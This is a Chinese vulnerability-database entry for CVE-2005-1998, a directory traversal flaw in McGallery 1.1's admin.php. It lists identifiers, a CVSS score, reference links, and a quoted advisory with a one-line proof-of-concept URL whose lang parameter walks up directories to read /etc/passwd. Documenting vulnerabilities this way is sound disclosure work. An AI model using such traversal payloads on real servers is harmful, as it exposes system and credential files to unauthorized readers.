McGallery ‘admin.php’ 目录遍历漏洞

McGallery ‘admin.php’ 目录遍历漏洞

漏洞ID 1108862 漏洞类型 路径遍历
发布时间 2005-06-15 更新时间 2005-10-20
图片[1]-McGallery ‘admin.php’ 目录遍历漏洞-安全小百科CVE编号 CVE-2005-1998
图片[2]-McGallery ‘admin.php’ 目录遍历漏洞-安全小百科CNNVD-ID CNNVD-200506-139
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25823
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-139
|漏洞详情
McGallery1.1的admin.php中存在目录遍历漏洞,远程攻击者可以借助lang参数中的”..”(参数内包含’..’)读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/13963/info

McGallery is prone to a file disclosure vulnerability.

This could let remote attackers access files on the computer in the context of the Web server process. 

http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd
|参考资料

来源:OSVDB
名称:17343
链接:http://www.osvdb.org/17343
来源:SECUNIA
名称:15727
链接:http://secunia.com/advisories/15727
来源:BUGTRAQ
名称:20050615Vulnerability:McGalleryv1.1filesreadingondisk
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111885505600482&w;=2
来源:BID
名称:13963
链接:http://www.securityfocus.com/bid/13963
来源:SECTRACK
名称:1014215
链接:http://securitytracker.com/id?1014215

相关推荐: Bugtracker.NET Unspecified SQL Injection Vulnerabilities

Bugtracker.NET Unspecified SQL Injection Vulnerabilities 漏洞ID 1096991 漏洞类型 Input Validation Error 发布时间 2005-03-29 更新时间 2005-03-29 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享